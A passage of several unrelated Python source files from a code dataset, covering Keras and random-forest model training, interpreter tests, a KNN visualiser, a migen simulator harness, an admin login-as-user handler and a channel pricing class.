Create a model and train it according to specified parameters.\n    Parameters:\n        data_folder - root image directory\n        training_subfolder - training images subfolder\n        validation_subfolder - validation images subfolder\n        arch - model architecture\n        hidden_units - int array with number of elements for each classifier hidden layer\n        dropout - dropout probability in classifier\n        epochs - number of epochs to run\n        learning_rate - learning rate to be used in optimizer\n        accuracy - validation accuracy threshold\n        optimization - set optimization algorithm (Adam/SGD)\n        bn - add Batch Normalization layers in classifier\n        full_net_epochs - Retrain all elements of network after classifier training for specified epochs\n    Returns:\n        model - the trained model object\n    \"\"\"\n    # Set data folder to current directory if empty\n    if (data_folder == ''):\n        data_folder = '.'\n\n\n    # Create model\n    print(\"Model architecture: '{}'\".format(arch), \"- GPU Mode: \", gpu_available())\n    base_model = create_new_model(arch)\n\n    # Dataset loading\n    pf = get_preprocess_function(arch)\n\n    train_generator = ImageDataGenerator(\n        rotation_range=20,\n        width_shift_range=0.2,\n        height_shift_range=0.2,\n        horizontal_flip=True, \n        preprocessing_function=pf\n        ).flow_from_directory(os.path.normpath(data_folder + training_subfolder), target_size=(224, 224),\n            class_mode='categorical', batch_size=batch_size)\n\n    valid_generator = ImageDataGenerator(\n        preprocessing_function=pf\n        ).flow_from_directory(os.path.normpath(data_folder + validation_subfolder), target_size=(224, 224),\n            class_mode='categorical', batch_size=batch_size)\n\n    # Create a new Classifier\n    model = create_classifier(base_model, hidden_units, len(set(train_generator.classes)), bn=bn)\n\n    for layer in base_model.layers:\n        layer.trainable = False\n\n    # Optimizer definition\n    optimizer = create_optimizer(optimization = optimization,\n                                 learning_rate = learning_rate)\n\n    model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['acc'])\n\n    print(model.summary())\n\n    print(\"Learning rate:\", learning_rate, \"- Criterion: CrossEntropyLoss\", \"- Optimizer:\", optimization)\n    print(\"Batch Size: {} - Training stops after {} epoch(s)\".format(batch_size, epochs), end = ' ')\n    if 
accuracy < 1:\n print(\"or validation accuracy > {}%\".format(accuracy*100), end = ' ')\n print()\n\n epoch_count = 0\n for e in range(epochs):\n print(\"\\n** Training epoch {}/{} BEGIN **\".format(e, epochs))\n history = model.fit_generator(generator=train_generator,\n steps_per_epoch=train_generator.n//train_generator.batch_size,\n validation_data=valid_generator,\n validation_steps=valid_generator.n//valid_generator.batch_size,\n epochs=1,\n use_multiprocessing = True,\n workers = 4)\n print(\"** Training epoch {}/{} END **\".format(e, epochs)) \n epoch_count += 1\n if history.history['val_acc'][0] > accuracy:\n break\n \n if full_net_epochs >0:\n print(\"\\n** Full network training **\")\n\n for layer in base_model.layers:\n layer.trainable = True\n\n # Optimizer definition\n optimizer = create_optimizer(optimization = optimization,\n learning_rate = learning_rate)\n\n model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['acc'])\n\n history = model.fit_generator(generator=train_generator,\n steps_per_epoch=train_generator.n//train_generator.batch_size,\n validation_data=valid_generator,\n validation_steps=valid_generator.n//valid_generator.batch_size,\n epochs=full_net_epochs,\n use_multiprocessing = True,\n workers = 4)\n \n \n model.config = { 'backend' : 'keras',\n 'arch' : arch,\n 'hidden_units' : hidden_units,\n 'dropout' : dropout,\n 'label_map': dict((v,k) for k,v in train_generator.class_indices.items()),\n 'train_epoch' : epoch_count + full_net_epochs,\n 'learning_rate' : learning_rate,\n 'bn' : bn,\n }\n \n return model\n\ndef save_model_config(model, filename):\n \"\"\"\n Save model configuration to json file\n \"\"\"\n with open(filename, 'w') as fp:\n json.dump(model.config, fp)\n \ndef load_model_config(filename): \n \"\"\"\n Load model configuration from json file and return it\n \"\"\"\n with open(filename, 'r') as fp:\n data = json.load(fp) \n return data\n\ndef save_checkpoint(model, destination_folder, filename = \"\"):\n \"\"\"\n Save model checkpoint to file.\n Parameters:\n model - the model object\n destination_folder - destination folder of checkpoint file\n filename - checkpoint filename\n Returns:\n filename - checkpoint filename\n \"\"\"\n # Compose filename\n if filename == \"\":\n filename = \"cp_{}_e{}_lr{}.h5\".format(model.config['arch'],\n model.config['train_epoch'],\n model.config['learning_rate'])\n \n if destination_folder == \"\":\n destination_folder = '.'\n\n full_filename = os.path.normpath(\"{}/{}\".format(destination_folder,filename))\n model.save(full_filename) \n\n config_file = full_filename.rsplit('.', 1)[0] + '.json'\n save_model_config(model, config_file)\n\n print(\"\\n** Model checkpoint saved to: '{}'\".format(full_filename))\n return filename\n\ndef create_model_from_checkpoint(filename):\n \"\"\"\n Create new model from checkpoint file.\n Parameters:\n filename - checkpoint filename\n Returns:\n model - the model object\n \"\"\"\n model = models.load_model(filename)\n\n config_file = filename.rsplit('.', 1)[0] + '.json'\n \n if os.path.isfile(config_file): \n model.config = load_model_config(config_file)\n else:\n raise Exception(\"Configuration file '{}' not found!\".format(config_file))\n \n model.pf = get_preprocess_function(model.config['arch'])\n \n return model \n\n\n# Predict the class (or classes) of an image\ndef predict(image_path, model, topk=5):\n ''' Predict the class (or classes) of an image using a trained deep learning model.'''\n \n #Load and pre-process image\n img = 
image.load_img(image_path, target_size=(224, 224))\n img_np = image.img_to_array(img)\n img_np = np.expand_dims(img_np, axis=0)\n img_np = model.pf(img_np) \n \n #Predict!\n ps = model.predict(img_np)[0]\n \n #Get topk\n classes_idx = np.argsort(ps)[::-1][:topk]\n probs = [ps[i] for i in classes_idx] \n \n classes = [model.config['label_map'][str(k)] for k in classes_idx] \n \n return probs, classes \n\n\n\n# Set TensorFlow log level (hide debug messages)\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \n\n# TODO: add module sanity check\nif __name__ == \"__main__\":\n pass\n","sub_path":"mainproject-classify-flower-images/model_helper_keras.py","file_name":"model_helper_keras.py","file_ext":"py","file_size_in_byte":13130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"372223297","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFunction RANDOM FOREST.\nCreated by : BenMobility\nCreated on : 22.11.2020\nModified on : 12.12.2020\n\nUPDATE : \n 1. added pickle \n 2. added the title for the performance indicators, hyperparameter tuning.\n 3. make the code as function itself and add a sys path to get a folder\n 4. delete the rf_helpers and add train_test_split function here\n\"\"\"\n#usual imports\nimport pandas as pd\nfrom pprint import pprint\nimport pickle\nimport numpy as np\n\n# scikitlearn helpers\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV\n\n# split function\ndef train_test_split(data, n_train):\n \"\"\"\n SPLIT TRAIN AND TEST sets from a univariate dataset\n\n Parameters\n ----------\n data : n x d dataframe pandas\n it contains the label and the features of the dataset.\n n_train : scalar\n tells how much rows you want to keep for the train set\n\n Returns\n -------\n TYPE\n train dataset from the first row to the scalar input.\n TYPE\n test dataset starts from the scalar input row until the end of the \n original dataset.\n \"\"\"\n return data[:n_train, :], data[n_train:, :]\n\n\n#random forest prediction\ndef rf_predict(nbday, tuning = True):\n \"\"\"\n Parameters\n ----------\n tuning : True / False, optional\n If tuning it is true, the function will go through the hyperparameter\n tuning with already selected parameter grid. If false, it will select\n the pickle with the provided number of days mem. 
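For context, this is how the pieces of model_helper_keras.py above fit together at inference time. A hypothetical usage sketch; the checkpoint and image filenames are assumptions (whatever save_checkpoint produced), not files shipped with the project:

```python
# Load a saved model and classify one image with the helpers defined above.
model = create_model_from_checkpoint('cp_densenet121_e10_lr0.05.h5')
probs, classes = predict('flower.jpg', model, topk=3)
for p, c in zip(probs, classes):
    print('{}: {:.1%}'.format(c, p))
```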
The default is True.\n nbdays : integer\n Number of days memory between [2, 10, 50, 100, 150]\n\n Returns\n -------\n y_predicted : n x 1, integers\n It returns the predicted values of a 80/20 split from the prepro data\n \"\"\"\n #check nbdays\n check = [2, 10, 50, 100, 150]\n if nbday not in check:\n print('\\nWrong number of days!\\n')\n print('Please choose between: 2, 10, 50, 100, 150')\n \n if nbday in check:\n #filename\n filename = 'Models\\RF\\RF_pickle{}'.format(nbday)\n \n #add one to nb of days to consider the first consider as the label\n nbdays = nbday + 1\n # load the dataset\n PATH = \"Data\\preprocessed.csv\"\n data = pd.read_csv(PATH, header=0, index_col=0)\n data = data.to_numpy()\n data = data[:,:nbdays]\n \n #train/test split ratio\n ratio = 0.80\n n_train = int(len(data) * ratio)\n train, test = train_test_split(data, n_train)\n \n #call the classifier\n rf = RandomForestClassifier(random_state = 17)\n \n if tuning == True:\n \n # Number of trees in random forest\n n_estimators = [int(x) for x in np.linspace(start = 1000, stop = 2000, num = 3)]\n # Number of features to consider at every split\n max_features = ['auto']\n # Maximum number of levels in tree\n max_depth = [int(x) for x in np.linspace(10, 50, num = 5)]\n max_depth.append(None)\n # Minimum number of samples required to split a node\n min_samples_split = [8, 10, 12]\n # Minimum number of samples required at each leaf node\n min_samples_leaf = [3, 4, 5]\n # Method of selecting samples for training each tree\n bootstrap = [True]\n \n # Create the random grid\n random_grid = {'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'min_samples_split': min_samples_split,\n 'min_samples_leaf': min_samples_leaf,\n 'bootstrap': bootstrap}\n print()\n print('Random grid for RF:\\n')\n pprint(random_grid)\n \n # Random search of parameters, using 3 fold cross validation, \n # search across 100 different combinations, and use all available cores\n rf_random = RandomizedSearchCV(estimator=rf, param_distributions=random_grid,\n n_iter = 100, scoring='f1_weighted', \n cv = 3, verbose=2, random_state=17, n_jobs=-1,\n return_train_score=True)\n # data for the train\n train_features, train_labels = train[:, 1:], train[:, 0]\n \n # Fit the random search model\n rf_random.fit(train_features, train_labels)\n \n # Get the best params\n best_grid = rf_random.best_params_\n best_random = rf_random.best_estimator_\n print(best_grid)\n \n #pickle\n pickle_out = open(filename,\"wb\")\n pickle.dump(best_random, pickle_out)\n pickle_out.close()\n \n #open the pickle\n pickle_in = open(filename, \"rb\")\n best_random = pickle.load(pickle_in)\n \n # test features and labels\n # data for the train\n test_features, y_true = test[:, 1:], test[:, 0]\n y_predicted = best_random.predict(test_features)\n return y_predicted, y_true","sub_path":"RF_run.py","file_name":"RF_run.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"648790764","text":"import numpy as np\nimport testing_helpers\nimport parakeet \n\nfrom parakeet.interp import adverb_evaluator as interp\n\nvec = np.array([1,4,9,16])\nmat = np.array([vec, vec+100, vec+200, vec + 300])\n\nexpected_sqrt_vec = np.sqrt(vec)\nexpected_sqrt_mat = np.sqrt(mat)\n\ndef test_map_1d():\n sqrt_vec = interp.eval_map(np.sqrt, values=[vec], axis=0)\n assert testing_helpers.eq(sqrt_vec, expected_sqrt_vec), \\\n \"Expected %s from Map but got %s\" % (expected_sqrt_vec, 
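A minimal sketch (not in the original RF_run.py) of scoring the split returned by rf_predict; it assumes the pickled RandomizedSearchCV winner for the chosen memory window already exists under Models\RF:

```python
from sklearn.metrics import classification_report

# tuning=False reuses the saved model instead of re-running the search.
y_pred, y_true = rf_predict(10, tuning=False)
print(classification_report(y_true, y_pred))
```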
sqrt_vec)\n\ndef test_map_2d():\n sqrt_mat = interp.eval_map(np.sqrt, values=[mat], axis=0)\n assert testing_helpers.eq(sqrt_mat, expected_sqrt_mat), \\\n \"Expected %s from Map but got %s\" % (expected_sqrt_mat, sqrt_mat)\n\n\"\"\"\ndef sqrt_with_output(x, output):\n output[:] = np.sqrt(x)\n\ndef test_map_2d_output():\n out = np.zeros_like(expected_sqrt_mat)\n interp.eval_map(sqrt_with_output, values=[mat], axis=0, output=out)\n assert testing_helpers.eq(out, expected_sqrt_mat), \\\n \"Expected %s from Map with output param but got %s\" % \\\n (expected_sqrt_mat, out)\n\"\"\"\n\ndef two_first_elts(x):\n return [x[0], x[0]]\n\n\"\"\"\ndef two_first_elts_with_output(x, out):\n out[:] = two_first_elts(x)\n\ndef test_complex_map_2d_output():\n expected = np.array([two_first_elts(x) for x in mat])\n out = np.zeros_like(expected)\n interp.eval_map(two_first_elts_with_output, values=[mat], axis=0, output=out)\n assert testing_helpers.eq(out, expected), \\\n \"Expected %s from Map with output param but got %s\" % \\\n (expected, out)\n\"\"\"\n\nexpected_sum_vec = np.sum(vec)\n\ndef test_reduce_1d():\n vec_sum = interp.eval_reduce(map_fn = interp.identity_function,\n combine = np.add,\n init = 0,\n values = [vec],\n axis = 0)\n\n assert testing_helpers.eq(vec_sum, expected_sum_vec), \\\n \"Expected %s from Reduce but got %s\" % (expected_sum_vec, vec_sum)\n\nexpected_sum_mat = np.sum(mat, axis=0)\n\ndef test_reduce_2d():\n mat_sum = interp.eval_reduce(map_fn = interp.identity_function,\n combine = np.add,\n init = 0,\n values = [mat],\n axis = 0)\n\n assert testing_helpers.eq(mat_sum, expected_sum_mat), \\\n \"Expected %s from Reduce but got %s\" % (expected_sum_mat, mat_sum)\n\n\"\"\"\ndef add_vec_with_output(x, y, out):\n out[:] = x + y\n\ndef test_reduce_2d_output():\n output = np.zeros_like(expected_sum_mat)\n interp.eval_reduce(\n map_fn = interp.identity_function,\n combine = add_vec_with_output,\n init = 0,\n values = [mat],\n axis = 0,\n output = output)\n\n assert testing_helpers.eq(output, expected_sum_mat), \\\n \"Expected %s from Reduce (with output) but got %s\" % \\\n (expected_sum_mat, output)\n\"\"\"\nbool_vec = np.array([True, False, True, False, True])\n\ndef test_bool_sum():\n vec_sum = interp.eval_reduce(\n map_fn = interp.identity_function,\n combine = (lambda x,y: x + y),\n init = 0,\n values = [bool_vec],\n axis = 0)\n assert vec_sum == np.sum(bool_vec), \\\n \"Expected %s but got %s\" % (np.sum(bool_vec), vec_sum)\n\nexpected_cumsum_vec = np.cumsum(vec)\n\ndef test_scan_1d():\n vec_prefixes = interp.eval_scan(map_fn=interp.identity_function,\n combine=np.add,\n emit=interp.identity_function,\n init=0,\n values=[vec],\n axis=0)\n\n assert testing_helpers.eq(vec_prefixes, expected_cumsum_vec), \\\n \"Expected %s from Scan but got %s\" % (expected_cumsum_vec, vec_prefixes)\n\nexpected_cumsum_mat = np.cumsum(mat, axis=0)\n\ndef test_scan_2d():\n mat_prefixes = interp.eval_scan(\n map_fn = interp.identity_function,\n combine = np.add,\n emit = interp.identity_function,\n init = 0,\n values = [mat],\n axis = 0)\n\n assert testing_helpers.eq(mat_prefixes, expected_cumsum_mat), \\\n \"Expected %s from Scan but got %s\" % (expected_cumsum_mat, mat_prefixes)\n\ndef test_allpairs():\n times_table = interp.eval_allpairs(np.multiply, vec, vec, 0)\n np_times_table = np.multiply.outer(vec, vec)\n assert testing_helpers.eq(times_table, np_times_table), \\\n \"Expected %s for AllPairs but got %s\" % \\\n (np_times_table, times_table)\n\n inner_products = interp.eval_allpairs(np.dot, mat, 
mat.T, 0)\n np_inner_products = np.dot(mat, mat)\n assert testing_helpers.eq(inner_products, np_inner_products), \\\n \"Expected %s for AllPairs but got %s\" % \\\n (inner_products, np_inner_products)\n\ndef test_index_map():\n indices = interp.eval_index_map(interp.identity_function, (10,))\n assert testing_helpers.eq(indices, np.arange(10)), \\\n \"Expected %s from IndexMap but got %s\" % (np.arange(10), indices)\n \ndef test_index_reduce():\n n = 10 \n total = interp.eval_index_reduce(interp.identity_function, np.add, (n,), 0)\n expected = sum(np.arange(10,))\n assert total == expected, \"Expected %d but got %d\" % (expected, total)\n total_no_tuple = interp.eval_index_reduce(interp.identity_function, np.add, n, 0)\n assert total_no_tuple == expected, \"Expected %d but got %d\" % (expected, total_no_tuple )\n\nif __name__ == '__main__':\n testing_helpers.run_local_tests()\n","sub_path":"tests/test_adverb_semantics.py","file_name":"test_adverb_semantics.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"34037184","text":"from PIL import Image\nimport random\nfrom knn import *\n\ndef saveImage(image, filename):\n image.save(filename)\n print(\"Saved image: \"+filename)\n\ndef createEmptyImage(width ,height):\n return Image.new('RGB', (width, height))\n\ndef paintPixel(image, x, y, color):\n image.putpixel((x, y), color)\n\ndef createClasses():\n return ((255, 0, 0), (0, 255, 0), (0, 0, 255))\n\ndef createRandomTrainElements(num, classes):\n array = []\n\n for i in range(num):\n #(x, y, class) tuple structure\n array.append((random.random(), random.random(), random.choice(classes)))\n\n return array\n\ndef VisualizeKNN(filename, width = 100, height = 100, tes=15, k = 5):\n\n # create image to hold data\n img = createEmptyImage(width, height)\n width = width-1\n height = height-1\n\n #create classes and train elements\n elem = createRandomTrainElements(tes, createClasses())\n\n # for each pixel, determine color based on knn\n print(\"Evaluating pixel colors!\")\n for x in range(width+1):\n for y in range(height+1):\n\n nn = NearestNeighbor(elem, (x/width, y/height), k) ##\n #print(str(nn))\n clr = nn[0]\n fp = nn[1] - 0.1\n clr = (int(clr[0]*fp), int(clr[1]*fp), int(clr[2]*fp))\n #paint pixel based on knn\n paintPixel(img, x, y, clr)\n #print(\"set color of \"+str(x)+\", \"+str(y)+ \" to \"+str(clr))\n\n # draw train elements\n print(\"Drawing Elements\")\n for e in elem:\n paintPixel(img, int(e[0]*width), int(e[1]*height), e[2])\n\n saveImage(img, filename)\n\ndef VisualizeWeightedKNN(filename, width=100, height=100, tes=15, k=5, t=0.0):\n # create image to hold data\n img = createEmptyImage(width, height)\n width = width-1\n height = height-1\n\n #create classes and train elements\n elem = createRandomTrainElements(tes, createClasses())\n\n print(\"Weighing elements!\")\n wda= getWeightedDataSetAndAccuracy(elem, k)\n w_elem = wda[0]\n\n\n for item in w_elem:\n print(\"Weighted: \"+str(item))\n\n print(\"\\nWeighting prediction accuracy: \"+str(int(wda[1]*100))+\"%\")\n\n # for each pixel, determine color based on knn\n print(\"Evaluating pixel colors!\")\n for x in range(width+1):\n for y in range(height+1):\n nn = WeightedNearestNeighbor(w_elem, (x/width, y/height), k)\n #nn = NearestNeighbor(elem, (x/width, y/height), k) ##\n #print(str(nn))\n clr = nn[0]\n fp = nn[1] - 0.1\n if nn[1] > t:\n clr = (int(clr[0]*fp), int(clr[1]*fp), int(clr[2]*fp))\n else:\n clr = (150, 150, 150)\n #paint 
pixel based on knn\n paintPixel(img, x, y, clr)\n #print(\"set color of \"+str(x)+\", \"+str(y)+ \" to \"+str(clr))\n\n # draw train elements\n print(\"Drawing Elements\")\n for e in elem:\n paintPixel(img, int(e[0]*width), int(e[1]*height), e[3])\n\n saveImage(img, filename)\n\ndef svKNN():\n size = int(input(\"What image size? (square): \"))\n tes = int(input(\"How many train elements?: \"))\n k = int(input(\"How large k?: \"))\n\n filename = \"vknn_\"+str(size)+\"_t\"+str(tes)+\"_k\"+str(k)+\".png\"\n\n print(\"Image will be created ( \"+filename+\" ) \\nRunning VisualizeKNN!\")\n VisualizeKNN(filename, size, size, tes, k)\n\ndef svWKNN():\n size = int(input(\"What image size? (square): \"))\n tes = int(input(\"How many train elements?: \"))\n k = int(input(\"How large k?: \"))\n filter = input(\"Exclude under(float 0.0 - 1.0):\")\n try:\n t = float(filter)\n except ValueError:\n t = 0.0\n\n filename = \"vwknn_\"+str(size)+\"_t\"+str(tes)+\"_k\"+str(k)+\".png\"\n\n print(\"Image will be created ( \"+filename+\" ) \\nRunning VisualizeWeightedKNN!\")\n VisualizeWeightedKNN(filename, size, size, tes, k, t)\n\ndef entryPoint():\n\n fun = int(input(\"Choose knn Function: (1) KNN, (2) WeightedKNN\"))\n if fun == 1 :\n svKNN()\n elif fun == 2 :\n svWKNN()\n else :\n print(\"Invalid answer! Shutting down program!\")\n\nentryPoint()\n","sub_path":"visualKNN.py","file_name":"visualKNN.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"313426777","text":"# vim:fileencoding=utf-8:ts=2:sw=2:expandtab\n\n\n\n###################################################################################################\n@Expose\ndef Request(self):\n yield\n \n # Read Input\n Account_Contact_MNID = IN_Int(self.Get.id)\n RURI = self.Get.RURI or '/admin/'\n \n # Set the LastURI\n App.SecurityContext.AuthStack.SetLastURI(RURI)\n\n # Execute the Login\n self.Login(Account_Contact_MNID)\n\n # Redirect to handle the account action\n yield self.RedirectResponse('/User/Home/')\n\n\n","sub_path":"Web/acrm/loginasuser.py","file_name":"loginasuser.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"256715470","text":"from migen.fhdl.std import *\nfrom migen.fhdl import verilog\nfrom migen.sim.ipc import *\nfrom migen.sim import icarus\n\nclass TopLevel:\n\tdef __init__(self, vcd_name=None, vcd_level=1,\n\t top_name=\"top\", dut_type=\"dut\", dut_name=\"dut\",\n\t cd_name=\"sys\", clk_period=10):\n\t\tself.vcd_name = vcd_name\n\t\tself.vcd_level = vcd_level\n\t\tself.top_name = top_name\n\t\tself.dut_type = dut_type\n\t\tself.dut_name = dut_name\n\t\t\n\t\tself._cd_name = cd_name\n\t\tself._clk_period = clk_period\n\t\t\n\t\tcd = ClockDomain(self._cd_name)\n\t\tself.clock_domains = [cd]\n\t\tself.ios = {cd.clk, cd.rst}\n\t\n\tdef get(self, sockaddr):\n\t\ttemplate1 = \"\"\"`timescale 1ns / 1ps\n\nmodule {top_name}();\n\nreg {clk_name};\nreg {rst_name};\n\ninitial begin\n\t{rst_name} <= 1'b1;\n\t@(posedge {clk_name});\n\t{rst_name} <= 1'b0;\nend\n\nalways begin\n\t{clk_name} <= 1'b0;\n\t#{hclk_period};\n\t{clk_name} <= 1'b1;\n\t#{hclk_period};\nend\n\n{dut_type} {dut_name}(\n\t.{rst_name}({rst_name}),\n\t.{clk_name}({clk_name})\n);\n\ninitial $migensim_connect(\"{sockaddr}\");\nalways @(posedge {clk_name}) $migensim_tick;\n\"\"\"\n\t\ttemplate2 = \"\"\"\ninitial begin\n\t$dumpfile(\"{vcd_name}\");\n\t$dumpvars({vcd_level}, 
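visualKNN.py imports NearestNeighbor from a knn module that is not included in this record. A minimal sketch of the signature the script relies on, reconstructed from the call sites as an assumption, not the original implementation: elements are (x, y, class) tuples and the return value is (winning class, vote fraction):

```python
import math
from collections import Counter

def NearestNeighbor(elements, point, k):
    # Sort train elements by Euclidean distance to the query point.
    dist = lambda e: math.hypot(e[0] - point[0], e[1] - point[1])
    nearest = sorted(elements, key=dist)[:k]
    # Majority vote among the k closest; return (class, vote share).
    cls, votes = Counter(e[2] for e in nearest).most_common(1)[0]
    return cls, votes / k
```

WeightedNearestNeighbor and getWeightedDataSetAndAccuracy, also imported above, are omitted here for the same reason.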
{dut_name});\nend\n\"\"\"\n\t\tr = template1.format(top_name=self.top_name,\n\t\t\tdut_type=self.dut_type,\n\t\t\tdut_name=self.dut_name,\n\t\t\tclk_name=self._cd_name + \"_clk\",\n\t\t\trst_name=self._cd_name + \"_rst\",\n\t\t\thclk_period=str(self._clk_period/2),\n\t\t\tsockaddr=sockaddr)\n\t\tif self.vcd_name is not None:\n\t\t\tr += template2.format(vcd_name=self.vcd_name,\n\t\t\t\tvcd_level=str(self.vcd_level),\n\t\t\t\tdut_name=self.dut_name)\n\t\tr += \"\\nendmodule\"\n\t\treturn r\n\ndef _call_sim(fragment, simulator):\n\tfor s in fragment.sim:\n\t\tif simulator.cycle_counter >= 0 or (hasattr(s, \"initialize\") and s.initialize):\n\t\t\ts(simulator)\n\nclass Simulator:\n\tdef __init__(self, fragment, top_level=None, sim_runner=None, sockaddr=\"simsocket\", **vopts):\n\t\tif not isinstance(fragment, Fragment):\n\t\t\tfragment = fragment.get_fragment()\n\t\tif top_level is None:\n\t\t\ttop_level = TopLevel()\n\t\tif sim_runner is None:\n\t\t\tsim_runner = icarus.Runner()\t\t\n\t\tself.fragment = fragment + Fragment(clock_domains=top_level.clock_domains)\n\t\tself.top_level = top_level\n\t\tself.ipc = Initiator(sockaddr)\n\t\tself.sim_runner = sim_runner\n\t\t\n\t\tc_top = self.top_level.get(sockaddr)\n\t\t\n\t\tc_fragment, self.namespace = verilog.convert(self.fragment,\n\t\t\tios=self.top_level.ios,\n\t\t\tname=self.top_level.dut_type,\n\t\t\treturn_ns=True,\n\t\t\t**vopts)\n\t\t\n\t\tself.cycle_counter = -1\n\t\tself.interrupt = False\n\n\t\tself.sim_runner = sim_runner\n\t\tself.sim_runner.start(c_top, c_fragment)\n\t\tself.ipc.accept()\n\t\treply = self.ipc.recv()\n\t\tassert(isinstance(reply, MessageTick))\n\t\t_call_sim(self.fragment, self)\n\t\n\tdef run(self, ncycles=-1):\n\t\tself.interrupt = False\n\t\tcounter = 0\n\t\twhile not self.interrupt and (ncycles < 0 or counter < ncycles):\n\t\t\tself.cycle_counter += 1\n\t\t\tcounter += 1\n\t\t\tself.ipc.send(MessageGo())\n\t\t\treply = self.ipc.recv()\n\t\t\tassert(isinstance(reply, MessageTick))\n\t\t\t_call_sim(self.fragment, self)\n\n\tdef rd(self, item, index=0):\n\t\tname = self.top_level.top_name + \".\" \\\n\t\t + self.top_level.dut_name + \".\" \\\n\t\t + self.namespace.get_name(item)\n\t\tself.ipc.send(MessageRead(name, Int32(index)))\n\t\treply = self.ipc.recv()\n\t\tassert(isinstance(reply, MessageReadReply))\n\t\tif isinstance(item, Memory):\n\t\t\tsigned = False\n\t\t\tnbits = item.width\n\t\telse:\n\t\t\tsigned = item.signed\n\t\t\tnbits = flen(item)\n\t\tvalue = reply.value & (2**nbits - 1)\n\t\tif signed and (value & 2**(nbits - 1)):\n\t\t\tvalue -= 2**nbits\n\t\treturn value\n\t\n\tdef wr(self, item, value, index=0):\n\t\tname = self.top_level.top_name + \".\" \\\n\t\t + self.top_level.dut_name + \".\" \\\n\t\t + self.namespace.get_name(item)\n\t\tif isinstance(item, Memory):\n\t\t\tnbits = item.width\n\t\telse:\n\t\t\tnbits = flen(item)\n\t\tif value < 0:\n\t\t\tvalue += 2**nbits\n\t\tassert(value >= 0 and value < 2**nbits)\n\t\tself.ipc.send(MessageWrite(name, Int32(index), value))\n\t\n\tdef multiread(self, obj):\n\t\tif isinstance(obj, Signal):\n\t\t\treturn self.rd(obj)\n\t\telif isinstance(obj, list):\n\t\t\tr = []\n\t\t\tfor item in obj:\n\t\t\t\trd = self.multiread(item)\n\t\t\t\tif isinstance(item, Signal) or rd:\n\t\t\t\t\tr.append(rd)\n\t\t\treturn r\n\t\telif hasattr(obj, \"__dict__\"):\n\t\t\tr = {}\n\t\t\tfor k, v in obj.__dict__.items():\n\t\t\t\trd = self.multiread(v)\n\t\t\t\tif isinstance(v, Signal) or rd:\n\t\t\t\t\tr[k] = rd\n\t\t\treturn r\n\t\n\tdef multiwrite(self, obj, value):\n\t\tif 
isinstance(obj, Signal):\n\t\t\tself.wr(obj, value)\n\t\telif isinstance(obj, list):\n\t\t\tfor target, source in zip(obj, value):\n\t\t\t\tself.multiwrite(target, source)\n\t\telse:\n\t\t\tfor k, v in value.items():\n\t\t\t\tself.multiwrite(getattr(obj, k), v)\n\n\tdef __del__(self):\n\t\tdel self.ipc\n\t\tdel self.sim_runner\n\n# Contrary to multiread/multiwrite, Proxy fetches the necessary signals only and\n# immediately forwards writes into the simulation.\nclass Proxy:\n\tdef __init__(self, sim, obj):\n\t\tself.__dict__[\"_sim\"] = sim\n\t\tself.__dict__[\"_obj\"] = obj\n\t\n\tdef __getattr__(self, name):\n\t\titem = getattr(self._obj, name)\n\t\tif isinstance(item, Signal):\n\t\t\treturn self._sim.rd(item)\n\t\telif isinstance(item, list):\n\t\t\treturn [Proxy(self._sim, si) for si in item]\n\t\telse:\n\t\t\treturn Proxy(self._sim, item)\n\n\tdef __setattr__(self, name, value):\n\t\titem = getattr(self._obj, name)\n\t\tassert(isinstance(item, Signal))\n\t\tself._sim.wr(item, value)\n","sub_path":"migen/sim/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"3896037","text":"from ChannelChild import ChannelChild\nimport pandas as pd\n\n\nclass Channel:\n tab_name = ''\n channel_name = ''\n channel_id = ''\n channel_type = ''\n children = []\n found_children = []\n mvr_price = 0.00\n tier1_price = 0.00\n tier2_price = 0.00\n tier3_price = 0.00\n\n def __init__(self):\n pass\n\n def capture_channel_information(self, channel_name, input_channel):\n \"\"\" captures the channel information from the spreadsheet \"\"\"\n self.tab_name = channel_name\n self.channel_id = input_channel[2]\n self.channel_name = input_channel[3]\n self.channel_type = input_channel[6]\n self.get_channel_pricing()\n\n def capture_missing_information(self, channel_name, input_channel):\n self.tab_name = channel_name\n self.channel_name = channel_name\n\n def get_children_from_database(self, input_conn, input_cur):\n child_query = \"\"\"select * from account_association where association_id = '%s'\"\"\"\n input_cur.execute(child_query % self.channel_id)\n self.found_children = input_cur.fetchall()\n for child in self.found_children:\n new_child = ChannelChild()\n new_child.child_id = child[0]\n new_child.child_name = child[1]\n new_child.check_price(input_cur)\n self.children.append(new_child)\n\n def get_children_from_spreadsheet(self):\n \"\"\" gets the children listed under the given association from the spreadsheet \"\"\"\n pass\n\n def compare_channel_children(self):\n \"\"\" compares the list of children from the spreadsheet and the database \"\"\"\n \"\"\" should log any differences found to a log file for further study \"\"\"\n pass\n\n def get_channel_pricing(self):\n print('****' + self.channel_name)\n print(self.channel_id)\n df = pd.read_excel('Channel Partner Assocation Reseller Pricing Detail.xlsx', self.tab_name, header=0)\n fee_columns = [x for x in df.columns if \"Fees\" in x and \"Baseline\" not in x]\n if len(fee_columns) == 0:\n df = pd.read_excel('Channel Partner Assocation Reseller Pricing Detail.xlsx', self.tab_name, header=1)\n fee_columns = [x for x in df.columns if \"Fees\" in x and \"Baseline\" not in x]\n self.get_pricing_info(df, fee_columns)\n self.print_pricing_info()\n\n\n def get_fee_type(self, current_data):\n # function to determine the fee type for a given current data set\n return_type = \"\"\n if \"MVR\" in current_data:\n return_type = 